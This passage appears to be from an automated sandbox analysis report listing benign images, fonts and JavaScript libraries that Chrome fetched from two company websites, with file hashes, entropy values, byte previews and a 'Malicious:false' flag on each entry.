                                              SHA-256:EAF3147E0C525C2D29E9E1FE84296282F38E72F5A55792092D2A13E6730C0D6E
                                              SHA-512:18093D53107F6D58D38973CE93EDFAF7CD6AEA0A852C4EE1798E9687410D0AC7B8F4FF7C0DD7D784DB3A799BC080CF1AA93029E2F9701E8F32F527295D48CACD
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/googlebusiness.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTEy..@Q.......\k....8H.AP. ........=N....w.........v........|.&..&..|.......1?....v...m.......@E.JZ.3.....z..?N.......w..o....`j....=H.an.Fu....)Z.f..K....-9............TIDATh...z....9.@@@N"...OU......&`..}...Am.$o..d.Z...d._3Y.q...}y..~X.K.~.^.......Em.Ln.}.o..Cs.=g9.'.|.Mk........|.9...U.}..j.._+`*%...u.&.}...m........+c".`,w...ax0.U...b......Pk...|._.....}..4...?..n..d.i@D.eF..~...g.A.?.p....?a.A1T.n..Y.'K......X...2V..e.Df_.A(.+QU...U.....%o2xn.Y...w3Q.+... ..Az%....P...R.(*.(.o..=Dm..B...C~&%.....E...-.%R.=./J.b..+,..q)..A.. ._.4,l*...OV*Y.......lW..V...GLJ..A.. ..._ .J.:D!..%..L.&d....EI;d..$g_a...7".l.U..._b.)....L...2..?BB....c....(.[....~16#...u^WB...,.....(....9... ..p..K}....l...J.l(.}$W..r...-.|.7!..K.`..FY|.........}aI.).....d... .s..Z:!.E.1.j..xP..../..[......W...e.<Rr..?.Dx..B......l..w...{..3.}N...~A...1.`#.[ .x.>6......U......w.@..`....=.%&..hs.2/..5..R/..Q....B..n..<.^.T@pJ..T.....X.. .|...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2000x1500, Scaling: [none]x[none], YUV color, decoders should clamp
                                              Category:downloaded
                                              Size (bytes):146776
                                              Entropy (8bit):7.997777101973561
                                              Encrypted:true
                                              SSDEEP:3072:S9vs7sPC3Z+pluyFOJMK+zfwKeZmxXIRxgllrx:kvaS3DFMJMwiVA6jx
                                              MD5:F0C962C85BF4BCDEA310F15B43B58D05
                                              SHA1:D20185D91BB6753ADAC1FA37F1954B29999B052F
                                              SHA-256:3327A036A3C162B539397E3293DA68D8B45FA1319F48745466D93D4E43010915
                                              SHA-512:3472FCF3B9D7A96F1DF078B8C1F8D1EC73FE5DD3A453F904BE6CDF23E0162CE5469DA0C208A1AC2F2294E2D291439C76F83B220E62A5726AEFDA8E7E8C9F9F12
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/portfolio/epg.webp
                                              Preview:RIFFP=..WEBPVP8 D=..P*...*....>Q(.F#..##.....gn.._......o2...n..........O....c.?z.Bt25..k..7._......k./~W.......;j..tw.E..5...+..oA~c.K.z.................U.......?..D...^....C.....W.7...g....d.T/....=.|...~..\.[.....Y..Y{.?...}..o.~i......?......#./.~3....._Q.....'..k.....I.O...?.?........../................>.[7._.............._..{................#.O...>...........e.........W...W..........i..._..........9..M...(.wB......{....`KS....C..Rc...%..#......NR!..e.-.e &.3..z...........MjR............NH.oU_....ro......i\.E../.....J......<.u.....X.h./.<.|h/[.J....D.T8C./.x..}...Y.G..m.pl.W"...S..<.........:z.iW.a.....%(aJ./.x..^P.E...]tk.....hj.7j.J.Q|..[..#.:z./.r/.x.....c..Mu....{........W.i\..........f..a..8.....<.>.~..0oR6{.m.e3+..u.r/.i&.0...........E..[|z............c^..V.9..R...K.?.i\.D.5.F.....K.....M....5...d.A.m{.(...A.~.....n.E........X5..u.B9.....+...".a.%..E.7.. ....5.F...[N..CXaFh..s....RW.</iC./...._.J._."..... ..!..3.U..5.GQ..k..u.....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1024x640, components 3
                                              Category:dropped
                                              Size (bytes):98044
                                              Entropy (8bit):7.98450953192217
                                              Encrypted:false
                                              SSDEEP:1536:O7QvWFkiVGneq4fZqtHvAKZt+gH3B6te8gy9/zCDqBA:O7QvWFkcG9PtSe8g0eOBA
                                              MD5:25BB573BE1481F75562E776BF958B4E4
                                              SHA1:8B75D9382E7FBDC443BFEB144D7C922365606F4B
                                              SHA-256:7B6006FE6DA825CC43015DA04E6BD90A9ECA6FD614662783FA0092E950D670CA
                                              SHA-512:E620558AA897859254244F82E20A1C9D9F242F790BEA0CDC20A2B175E01F9B06538F6A2B51E1B9C6460819E2D73F5624CBADCA75B5848FF87096EE5F4E88009B
                                              Malicious:false
                                              Reputation:low
                                              Preview:......JFIF...........................................'......'#*" "*#>1++1>H<9<HWNNWmhm................................'......'#*" "*#>1++1>H<9<HWNNWmhm.............."...................................................$.&I&I$.t.I$.I't.....4N9.}..x.....I..I'N.9;.):I.:[..L.'t..(..d.$..I.I$.I&I;..9'II...K...E.U..fL.$.I.$.;.d.d.'E.v,.L.'wN....I3$.&I$.L.:..N.$.:I<.{...{z..y.^...ft.t..v')\.2d.<.R.$..t.......$..&L.I.:gI.I:L..I....{.6lO...M\..$.N.:w.L..d.$.....'N...."......d.$.$.$.I$.2t.t.I$.s......M.g..:N..7A..W.RI......$.$...?^Y.....3'B...$.$.gI"d.I$.Jj.+6b..@.,.N.$N..$B..$.=L..".wD.:}...mG..L..gI3.t.N.I:I.I$.$.S33$..wH...vL.$..[i$.t..D.G..KZ.2d.&I;.vI;...2I3'I'N..&I..I$.r.nA.V..z.!L.$.6..d.wN....!qt. .d.2B..d.t..8..t.d.I$..L..I.k...=,..1...R...6d.L...D.wwNP924.33$p.2N.I'LV=.qx9..k..I.I'wI.I.I:V".>....tA.z\.}M.2y..M..l.3...N.HS....;3&I$.$.:..f.i..Tw..Y..$.w6t.$.;..$..A..X...O.5.u9:"B.+.cI$I..4..cw...f..$.N....#Cb.....qfL.9..HRN......P.....D...'..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (886)
                                              Category:dropped
                                              Size (bytes):71581
                                              Entropy (8bit):4.024123069408272
                                              Encrypted:false
                                              SSDEEP:768:Ku/GVO1bf9UuHyA4T3E3o9upOCRDLeIMdnmqB4UoLMJzXmdE3uYKk2N1f:Kv+T74TTkDT8jQMak27
                                              MD5:A8A8E7613AF1615A08DE56A794A478C5
                                              SHA1:93A903BDE48038384F1076332B2CDCD61EF6D351
                                              SHA-256:18734CDE412853B2861D9294A0501C3DB6EF4D903DB12287A8A1D7A62E998248
                                              SHA-512:7A5C4529604523DEADF772333164B4B2751588A199F4723B68324B13C0DF9D93D6A9302FE0B30F678019DF2F967ADA67D170D894ED213F086C2237225AA72C61
                                              Malicious:false
                                              Reputation:low
                                              Preview:/*!. * ScrollTrigger 3.11.2. * https://greensock.com. * . * @license Copyright 2022, GreenSock. All rights reserved.. * Subject to the terms at https://greensock.com/standard-license or for Club GreenSock members, the agreement issued with that membership.. * @author: Jack Doyle, jack@greensock.com. */..!function(e, t) {. "object" == typeof exports && "undefined" != typeof module ? t(exports) : "function" == typeof define && define.amd ? define(["exports"], t) : t((e = e || self).window = e.window || {}).}(this, function(e) {. "use strict";. function _defineProperties(e, t) {. for (var r = 0; r < t.length; r++) {. var n = t[r];. n.enumerable = n.enumerable || !1,. n.configurable = !0,. "value"in n && (n.writable = !0),. Object.defineProperty(e, n.key, n). }. }. function q() {. return we || "undefined" != typeof window && (we = window.gsap) && we.registerPlugin && we. }. function y(e, t) {.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:downloaded
                                              Size (bytes):102
                                              Entropy (8bit):4.921030304008144
                                              Encrypted:false
                                              SSDEEP:3:JSbMqSL1cdXWKQKzaXORdQzXWaee:PLKdXNQKGeOL
                                              MD5:59EE3965FCB16F88E9BDC20B9CD8612E
                                              SHA1:3D93A27E4DAC9DDA01DC5BBCCA9E1F53E827DAF2
                                              SHA-256:020A92F2FB27981D1398F916AE17400F8F11473962EBD858B7BF6901814EDD7B
                                              SHA-512:3E4C07D9CE3DEDE2998A59C32A3FE12D781AAE33C4AFE8D2B9B0D12C18EB96257373098497B5F3C909EC1EDE64FEB4B4074DBDB9678B4D6B019CD64360222849
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.google.com/recaptcha/api2/webworker.js?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY
                                              Preview:importScripts('https://www.gstatic.com/recaptcha/releases/xds0rzGrktR88uEZ2JUvdgOY/recaptcha__en.js');
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text
                                              Category:downloaded
                                              Size (bytes):13675
                                              Entropy (8bit):5.438775130500858
                                              Encrypted:false
                                              SSDEEP:192:qlaQh2tsS5l9QuptXS0l4QnkteSflDQ8PtRS6lmQ1qtASdlZQyNtrSBLSd9wZgbl:2p2mOXqs6FOizQ
                                              MD5:E86AD3F2103F3D75C212CECDE0E125E8
                                              SHA1:EED561F008E1EC52629D37FD37B3FEAF0C462A52
                                              SHA-256:8DF8B5DDBFDA0ED7D16DD9681736E045A256C7433B9B67524BF0E2E1616C233A
                                              SHA-512:168C542454147A7A5760828AFBEF4FC4D7F88FBE6AC5C7C06739FFEBC30B18493EA64D28AE2FF0079A421DDA71B6647F2D630A5DCF0DFA5220F57E976041581E
                                              Malicious:false
                                              Reputation:low
                                              URL:"https://fonts.googleapis.com/css?family=Montserrat:400,500,600,700,800,900|Poppins:400,600,700|Questrial&subset=devanagari,latin-ext,vietnamese"
                                              Preview:/* cyrillic-ext */.@font-face {. font-family: 'Montserrat';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Montserrat';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* vietnamese */.@font-face {. font-family: 'Montserrat';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./* latin-ext */.@font-face {. font-f
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):8963
                                              Entropy (8bit):7.9350337778513085
                                              Encrypted:false
                                              SSDEEP:192:G0pI4Iw6I0UAMXaVssHQIGKT0cQcgqRbcARegfvjSbXogUeANNW:PpI4Iw4PMXaVvHQvEgqRQMfvjnNg
                                              MD5:527DDDD0C59B89C8138C1409D576FAFC
                                              SHA1:EFC6D7B1346DEA92EBEF4C7E81B6053E5286F3E2
                                              SHA-256:A89C5D24B3BD329D036FF561FAAB33A6FCE8A094F8F0AF7C64578A670FB4FDC3
                                              SHA-512:99E042E2001C2E8D74D512841CC01D15FD7E2190CE2AB1E7105C9D83E17CDF4C2EAF79E1D29550DBB0F8A9C0760AEF0EAD98997D617346AB77B4CFFE3944A90F
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/13.png
                                              Preview:.PNG........IHDR.......P......N......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.da4a7e5ef, 2022/11/22-13:50:07 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:61D9DBF9D7D211EDBBB3B8489115637F" xmpMM:DocumentID="xmp.did:61D9DBFAD7D211EDBBB3B8489115637F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:61D9DBF7D7D211EDBBB3B8489115637F" stRef:documentID="xmp.did:61D9DBF8D7D211EDBBB3B8489115637F"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>......sIDATx..}.....79o.A..V..d...A.&..\.....L...:.].......e.....#`.....d..0"(..+...yW.&......gv....sA;..j..t..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (1143)
                                              Category:dropped
                                              Size (bytes):4272
                                              Entropy (8bit):5.407649241930215
                                              Encrypted:false
                                              SSDEEP:96:bVcC0LhyRs71268NYZOAx/rfuNfnAZe5PwGNHW:B3qhpRByNPx54GN2
                                              MD5:B427175FA1078775EB792756E7B6D1E7
                                              SHA1:4C55C0233D3D9002B3449C025F97821F8BB8900D
                                              SHA-256:EE147E859AD0F09AA50367974E38AB53E7C7054C4A51D400A7F45B0EB251454F
                                              SHA-512:AF8D384188363378BC99C2E51523E74E1D18BA77D51BFF7647A377A117499421F9E94477E09907925E46DAD0A908B799A616D0B4855FFFF064BA6350815063D3
                                              Malicious:false
                                              Reputation:low
                                              Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.'use strict';var l=function(){var a=h,b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},m=this||self,n=/^[\w+/_-]+[=]{0,2}$/,p=null,q=function(a){return(a=a.querySelector&&a.querySelector("script[nonce]"))&&(a=a.nonce||a.getAttribute("nonce"))&&n.test(a)?a:""},r=function(a,b){function e(){}e.prototype=b.prototype;a.i=b.prototype;a.prototype=new e;a.prototype.constructor=a;a.h=function(c,g,k){for(var f=Array(arguments.length-2),d=2;d<arguments.length;d++)f[d-2]=arguments[d];.return b.prototype[g].apply(c,f)}},t=function(a){return a};function u(a){if(Error.captureStackTrace)Error.captureStackTrace(this,u);else{var b=Error().stack;b&&(this.stack=b)}a&&(this.message=String(a))}r(u,Error);u.prototype.name="CustomError";var v=function(a,b){a=a.split("%s");for(var e="",c=a.length-1,g=0;g<c;g++)e+=a[g]+(g<b.length?b[g]:"%s");u.call(this,e+a[c])};r(v,u);v.prototype.name="Asse
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):17073
                                              Entropy (8bit):7.7361423103948805
                                              Encrypted:false
                                              SSDEEP:384:4YNg7DuXEc01NPwFLSFeXoaCJ7sHJn6iWAVvBwhM7Ttx569zY31WH:4Yyu0vToFLSFeXPUAHh5WyvBj7Ttx56v
                                              MD5:65EB618583D820621A984BB8C78320B3
                                              SHA1:6EA1D7DCB231FF3A9E8287F66DD9F7494323804D
                                              SHA-256:14E004D6A8961F8E63F634C15FFA779C49A0553F0E1436FB0738D6264BAEFBFE
                                              SHA-512:2F3C718513EEAB4ED8D3A153187F2DA837C697CB5DD20E509ADD27F212D0A969CED643D13620C3C726BACA56DCDFBDAC3D766C86C03F04391CCDB512777B6F45
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/13/4324ea70eab5d63ba32093867991578f.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (906)
                                              Category:dropped
                                              Size (bytes):2675
                                              Entropy (8bit):5.3343911471610905
                                              Encrypted:false
                                              SSDEEP:48:D1+kqj0watiHZDYWcjPlmVoTimWyWCk5OhcKMy01FiSxvQhIKsoXwyRn:D1+Z0waH5PQlldO6KMSSxtrewyRn
                                              MD5:41E499E0599AB53FCFC0C2CACD6520BF
                                              SHA1:B79D0C9317CF5BE6F5353B02E07B842FB4B6E48D
                                              SHA-256:D0713279F74A920D9CF7143B4B34F69EF184BF2E0060CF3AC30AE2A993F7761D
                                              SHA-512:D3591133A3475D456A68B2DA8E916C516AC63774FD9F046668A6BA442E32784C59971EF27D1FD1D3365AB05B37F9F8AEBDA88531340BA93E53060577D3166738
                                              Malicious:false
                                              Reputation:low
                                              Preview:google.maps.__gjsload__('search', function(_){var wva=function(){},WB=function(a){this.setValues(a);_.Qi("search_impl")},yva=function(a){let b=_.nl,c=-1;a.tiles.forEach(e=>{e.zoom>c&&(b=e.fi,c=e.zoom)});if(c===-1)return[];const d=[];a.Du().forEach(e=>{e.a&&e.a.length>=2&&d.push(new xva(e,b,c))});return d},zva=function(a){const b=[];a.data.forEach(c=>{b.push(...yva(c))});return b};_.Ga(wva,_.rk);var Ava={["1"]:{}},xva=class{constructor(a,b,c){this.Jp=b;this.zoom=c;this.bounds=this.anchor=null;this.Eg=Ava;this.source=a;this.featureId=this.source.id||"0";this.infoWindowOffset=(this.source.io||[]).length===2?new google.maps.Point(this.source.io[0],this.source.io[1]):null}getAnchor(){if(!this.anchor){const a=1<<this.zoom;this.anchor=_.Rl(new _.cm((this.Jp.x*256+this.source.a[0])/a,(this.Jp.y*256+this.source.a[1])/a)).toJSON()}return this.anchor}getCompleteBounds(){return this.getBounds().reduce((a,.b)=>{a.extendByBounds(b);return a},_.Vl(0,0,0,0))}getBounds(){if(this.bounds===null){this.bou
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1000x800, components 3
                                              Category:downloaded
                                              Size (bytes):101415
                                              Entropy (8bit):7.973433675861473
                                              Encrypted:false
                                              SSDEEP:3072:TXNS7TzXyOrYwEJpBDW0Aw7PQ0waPzk3kBmomH6fXRiq2d7:azXyCYPM0Ps0nqkwoYN
                                              MD5:12E240ABC2238A9EA372538365F51958
                                              SHA1:A8D6521F55BA44F3FA5CF9704F6526A74DDF3C82
                                              SHA-256:8BB66F5D0222326382E775B3F0C4F567B4FDBA684493004D7E1A964EA6863A81
                                              SHA-512:8D97D35CF8A5AD5AEC49A27CA56404051BF10F16498A12B966E84F14D9D5FD49086BCCE283910AFBD55D5B6B80409EDF04F7BF7644D11FD491E21E3BC76126BE
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/services/5/6b7430e47711776a692abe259b42d33c.jpg
                                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:CED80F76934211ED8222E6AEB029D772" xmpMM:DocumentID="xmp.did:CED80F77934211ED8222E6AEB029D772"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CED80F74934211ED8222E6AEB029D772" stRef:documentID="xmp.did:CED80F75934211ED8222E6AEB029D772"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d..............O....Q...%..........................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):6837
                                              Entropy (8bit):7.959864047003786
                                              Encrypted:false
                                              SSDEEP:96:Dizo56s3rL3xAGVTfVMC8bp8SjOOqRDZNiO4N6VVTe1rH9N78ltxxbYypLwQzzBa:DiuJfh9xfulbp87Oqz48IgSozlwz
                                              MD5:3D243E9AAFFFE83260A1AA57D65B8758
                                              SHA1:D3DC5A2C21886F9509AA922938D7AFC5E9BFEBE1
                                              SHA-256:887DAA665226124AC381E15EDD1926BA60171F33ADEF8A19BC7FDF1A78A84CBC
                                              SHA-512:0C23EF8316BD94D848175174504E96FD3DE357744814523C2FBC4F3A293BBC1F94CA23026F974F1B06709E306BC85E0B2349A9242D108C0BB5076161D14752AC
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/smm.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE.................................................3B.9@................................(:|..#......../e.....................S...8J...$;...........:=.....S...............CZ....G`......,?xF\....................,j.3N...."O..y.. Aw..A....66.........5J.........N...*.+GJ.....W....../9..%[..................-?)8r...........@X.......%7.................~....................S.........I.....AE..........F_..........."...^..I`...........1........................w..........<=x....@X<........'F......._....g..Lz..........................1..{..A`.............Yp.Um.[s.@U\?d..;.$5..|..._y$..8X...9O..IoR..m..q.........w.......<j.z.........s..6Q.......%../......./.......{......5......m....PA`..$ee...e..[>?^.X)....pIDATh..kPS...s......H 1..B..!..@...f.2.-P`...0Y..(....-....:.....H.Y..3u......u........>'.V2..;!....y....!.~..Ey...L xQ.tDH.:z.....Y...0.o...(..gQ.V@Q*.@ .y<......n...V..>
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):88374
                                              Entropy (8bit):7.991791782591795
                                              Encrypted:true
                                              SSDEEP:1536:t+timGr9GgXGwx+ttU85ThDmDIja7zR5FfGP65Sohh7m8rm:8tQzx+PUqlDHuzndGC5SGhiqm
                                              MD5:7E38A68B2B51F463FEE51D1FB14B5AE1
                                              SHA1:9ED31BAAC0E27E04462AB06423B8654DD2BBA949
                                              SHA-256:D483577F91577B02E44B15DF7E34AB61A7711B805D25277136546425EDD10BB8
                                              SHA-512:A6AB2F840154C7F785F50C124959CFFAA3AA2563A2B3560291BC6B10B5D04D4DFF09A8687F2B7AA3626F2B2D6E6C974552A9AC3FA05FD4F002D9911E5B8C7C77
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/menu1.webp
                                              Preview:RIFF.Y..WEBPVP8X..............ALPH*......m.I.....jW....... ....8....g.*.bI.F.H.....).,\$...h...`.@a7..Du..m.,....E...@.....mK...................'.1O..X....k...RDx.l[.$I..M.2....}D..`..[.m.m.m.{G...m.....A!(....nE.4....*..{..........h....7{..'.H....@..l.._.0,.....6k{.=.?.P..D.....r=FD.l.j.....d..`.......k.k...F.@..?@....a<..._...^4.y.\O.....v..z#..F..k......!.?.?.E#2.e.....pLk.....k.0.VFWk.I.A.4a.#....Z...,..(k%.K..[.8.>.}.Y&..v.1.4`...1c.Ni.......Z..<tW.G..z{;...]..X..9.:.Q..Il?F..\@ ....=.&..PFBIy......7.o......5.......v..[....nd.Kc.|.6..]..7...h..*{3}....d.Nr.!.e.&.#...C`.g..:..B...Ek...O..#....v..W..:.....?[f.@k.a..2.nWa.........v./.....]+`i.....|.Y]x.....w!.#$ ..#...........V."...rC.5O.....s..%..;S..3..X{..]..._......+....;....e.h]..QJSSD.."M...."......KW.Z+.3.Y..."@....|[..s....3`...e...|..L....*1gLd......-p&;..X+~....k.Xm....[. F2!......V[.w.lZv&>.2."%AQhE.`.....I....eq.J....n..o.=.?..ak.Q.9...qqL`..}.......3mS})W.+..^..6....D2.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):9954
                                              Entropy (8bit):7.444383224222293
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKw/dKbK7Ww51FAUTP8MXAxnzEHNLprWkCKY:4YNg7FKKqw51FvAMcnzE7yDKY
                                              MD5:29824E7F7EFE6B2BA898A2BA8D30BD0B
                                              SHA1:6284340432DCCADB0537A12E3882244CFCB53AFB
                                              SHA-256:5592337B244C2F5F4B299303482685FF84770908D70BB010B7F96B0E93DE65E3
                                              SHA-512:428936CE8EA686213F3FAC5228A79527120D41BA42296F02FCADB0C807A4DEA1773F0FE839F5743A61C8E8DF249904095AB44430F10FFBBDC5F23ABFB2EFCFF2
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 21 x 15, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):227
                                              Entropy (8bit):6.312101672192353
                                              Encrypted:false
                                              SSDEEP:6:6v/lhPJIIsB/6TsR/WxoFhvKBY8QUW4yIrGcZEWqtjp:6v/7nO/6Ts/RLvrwOWON
                                              MD5:9BF71E02CAE86D3531874FBDCF4F065E
                                              SHA1:854A8797F34AC41CD7D36718108F950DBA7EBF4A
                                              SHA-256:FEA8DAF5E826C31879B0653A43AC509B48ABAA6A5214847EFBA242A31CC32F66
                                              SHA-512:9DF0D465723748D0CAE31DCB8D7A7697D405F493FA3541D33D19AD8A74E7549971DCF9C909B3025E37ECF113AE7E7B864A7A8DE84A88792A05FF86F607AFA446
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR..............Z.k....pHYs.................sRGB.........gAMA......a....xIDATx...... .......,.&.....#..l..,..GI*..p..&m.......:.Zon.....gc.G....sn.........T...Rvf.V.....z..lXR.}..Nd..3.$y|.ir ..>.K....IEND.B`.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):9296
                                              Entropy (8bit):7.362957719049136
                                              Encrypted:false
                                              SSDEEP:96:pN26MT0D5MdtbZPAVwzVQXw+4o3IN1ltZxud2eR3KdHLNOqsoDeyNzuEBkz1yXxu:4YNMtKw6dV0zuAeRadHLNtDvluENmDHX
                                              MD5:A51D5F70091F86A5C657FE69FA04DCFE
                                              SHA1:37F1CB715F6C33204970DC7812BEFDDEC04C2187
                                              SHA-256:A32E6E24197F2D82A60BDAAD03560CCD5AD0A72F612E3D9FE08899D7B974B185
                                              SHA-512:D10555CFF02EFCB11A707372B45CC3E32DDD5E08D20BED6ECCE8339AB24776878F10C776AC4B68CD701B19ED0D953F073E4A3A91F4423477F9E9CBC980BBC7EF
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):7059
                                              Entropy (8bit):7.954430035945746
                                              Encrypted:false
                                              SSDEEP:192:K/dCWzPit10esaOoQkgat4gOQLoCGvRDvQhXLIRjhv:K/dzF2l4PQmY14R
                                              MD5:D84DDF1885F44B512D0058DEE97E61B8
